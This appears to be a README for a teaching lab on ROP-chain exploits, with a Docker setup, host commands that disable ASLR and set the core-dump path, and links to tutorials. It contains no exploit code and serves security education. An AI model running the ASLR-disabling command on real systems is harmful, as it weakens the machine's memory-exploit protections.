A lab to explain ropchain exploits
This is part of CyberSword.
This is a docker container that instructs students to overwrite $eip with a buffer overflow to perform a ropchain attack.
The host system will need to be configured to store host files and to disable ASLR
# Disable ASLR
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
# Store core files in /tmp
echo '/tmp/core.%e.%p' | sudo tee /proc/sys/kernel/core_patternThis lab expects to be in a docker-compose.yml like this, from CyberSword.
If you don't want to use that, delete the lines that expect the setup scripts.
- https://textbook.cs161.org/memory-safety/x86.html
- https://stackoverflow.com/questions/69559640/how-can-i-get-a-corefile-for-a-pe-in-python-like-i-can-with-pwntools-for-an-elf
- https://tc.gts3.org/cs6265/tut/tut06-01-rop.html
- https://github.com/Gallopsled/pwntools-tutorial/blob/master/rop.md
- https://docs.pwntools.com/en/stable/rop/rop.html
- https://ocw.cs.pub.ro/courses/cns/labs/lab-08
- https://ir0nstone.gitbook.io/notes/binexp/stack/pie/pie-bypass
- https://docs.pwntools.com/en/stable/elf/corefile.html